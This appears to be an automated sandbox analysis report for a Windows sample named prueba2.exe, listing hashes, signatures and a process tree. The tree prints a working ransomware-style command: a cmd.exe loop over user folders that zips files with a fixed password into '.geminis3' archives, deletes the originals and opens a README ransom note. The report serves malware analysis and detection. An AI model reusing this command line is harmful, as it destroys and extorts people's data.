Analysis

  • max time kernel
    107s
  • max time network
    74s
  • platform
    windows7_x64
  • resource
    win7v200410
  • submitted
    28-04-2020 01:36

General

  • Target

    prueba2.exe

  • Size

    329KB

  • MD5

    9f5f9c71bb71b8e1571fc4d27721a99e

  • SHA1

    e64de07b46d896d25dc059dd774a140f109364c3

  • SHA256

    be3d67f3432d29b8339b324a0ee3150039da4cd7e95a3dcb564cca70f572603f

  • SHA512

    6c5f031ef96f6fb930bb57c0cc1287f2f34d21475f2710f88341f955405e9cc37143a037939d5cd8387fe80f63ef9ad3ca7b70575d75dcfbca475bda9d941c16

Score
1/10

Signatures

  • Suspicious use of WriteProcessMemory 21 IoCs
  • Suspicious use of AdjustPrivilegeToken 84 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\prueba2.exe
    "C:\Users\Admin\AppData\Local\Temp\prueba2.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2040
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Documents %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "%d.geminis3" "%d"
      2⤵
      PID:1116
      • C:\PROGRA~1\7-ZIP\7z.exe
        "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\Are.docx.geminis3" "C:\Users\Admin\Documents\Are.docx"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:316
      • C:\PROGRA~1\7-ZIP\7z.exe
        "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\Files.docx.geminis3" "C:\Users\Admin\Documents\Files.docx"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1128
      • C:\PROGRA~1\7-ZIP\7z.exe
        "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\Opened.docx.geminis3" "C:\Users\Admin\Documents\Opened.docx"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1316
      • C:\PROGRA~1\7-ZIP\7z.exe
        "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\Recently.docx.geminis3" "C:\Users\Admin\Documents\Recently.docx"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:624
      • C:\PROGRA~1\7-ZIP\7z.exe
        "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\StepMount.docm.geminis3" "C:\Users\Admin\Documents\StepMount.docm"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1336
      • C:\PROGRA~1\7-ZIP\7z.exe
        "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\These.docx.geminis3" "C:\Users\Admin\Documents\These.docx"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1436
      • C:\PROGRA~1\7-ZIP\7z.exe
        "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\UseAssert.docm.geminis3" "C:\Users\Admin\Documents\UseAssert.docm"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1476
      • C:\PROGRA~1\7-ZIP\7z.exe
        "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\OutBackup.pdf.geminis3" "C:\Users\Admin\Documents\OutBackup.pdf"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1520
      • C:\PROGRA~1\7-ZIP\7z.exe
        "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\BlockDebug.xlsm.geminis3" "C:\Users\Admin\Documents\BlockDebug.xlsm"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1612
      • C:\PROGRA~1\7-ZIP\7z.exe
        "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\EnterMerge.xls.geminis3" "C:\Users\Admin\Documents\EnterMerge.xls"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1624
      • C:\PROGRA~1\7-ZIP\7z.exe
        "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\MeasureApprove.xls.geminis3" "C:\Users\Admin\Documents\MeasureApprove.xls"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1656
      • C:\PROGRA~1\7-ZIP\7z.exe
        "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\ConvertToEdit.pptx.geminis3" "C:\Users\Admin\Documents\ConvertToEdit.pptx"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1668
      • C:\PROGRA~1\7-ZIP\7z.exe
        "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\NewMeasure.pptx.geminis3" "C:\Users\Admin\Documents\NewMeasure.pptx"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1664
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Pictures %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "%d.geminis3" "%d"
      2⤵
      PID:1004
      • C:\PROGRA~1\7-ZIP\7z.exe
        "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Pictures\ConnectComplete.jpg.geminis3" "C:\Users\Admin\Pictures\ConnectComplete.jpg"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1688
      • C:\PROGRA~1\7-ZIP\7z.exe
        "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Pictures\ConvertToSend.jpg.geminis3" "C:\Users\Admin\Pictures\ConvertToSend.jpg"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:792
      • C:\PROGRA~1\7-ZIP\7z.exe
        "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Pictures\Wallpaper.jpg.geminis3" "C:\Users\Admin\Pictures\Wallpaper.jpg"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:328
      • C:\PROGRA~1\7-ZIP\7z.exe
        "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Pictures\RegisterNew.png.geminis3" "C:\Users\Admin\Pictures\RegisterNew.png"
        3⤵
        PID:1692
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Downloads %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "%d.geminis3" "%d"
      2⤵
      PID:1704
      • C:\PROGRA~1\7-ZIP\7z.exe
        "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Downloads\ConvertToFormat.ppt.geminis3" "C:\Users\Admin\Downloads\ConvertToFormat.ppt"
        3⤵
        PID:1696
      • C:\PROGRA~1\7-ZIP\7z.exe
        "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Downloads\EnterSync.txt.geminis3" "C:\Users\Admin\Downloads\EnterSync.txt"
        3⤵
        PID:1708
      • C:\PROGRA~1\7-ZIP\7z.exe
        "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Downloads\StopOpen.rar.geminis3" "C:\Users\Admin\Downloads\StopOpen.rar"
        3⤵
        PID:1720
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Music %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "%d.geminis3" "%d"
      2⤵
      PID:868
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Videos %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "%d.geminis3" "%d"
      2⤵
      PID:456
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Desktop %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "%d.geminis3" "%d"
      2⤵
      PID:1800
      • C:\PROGRA~1\7-ZIP\7z.exe
        "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Desktop\FormatUnlock.7z.geminis3" "C:\Users\Admin\Desktop\FormatUnlock.7z"
        3⤵
        PID:1808
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start README.txt
      2⤵
      PID:1768
      • C:\Windows\system32\NOTEPAD.EXE
        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\README.txt
        3⤵
        • Opens file in notepad (likely ransom note)
        PID:1736
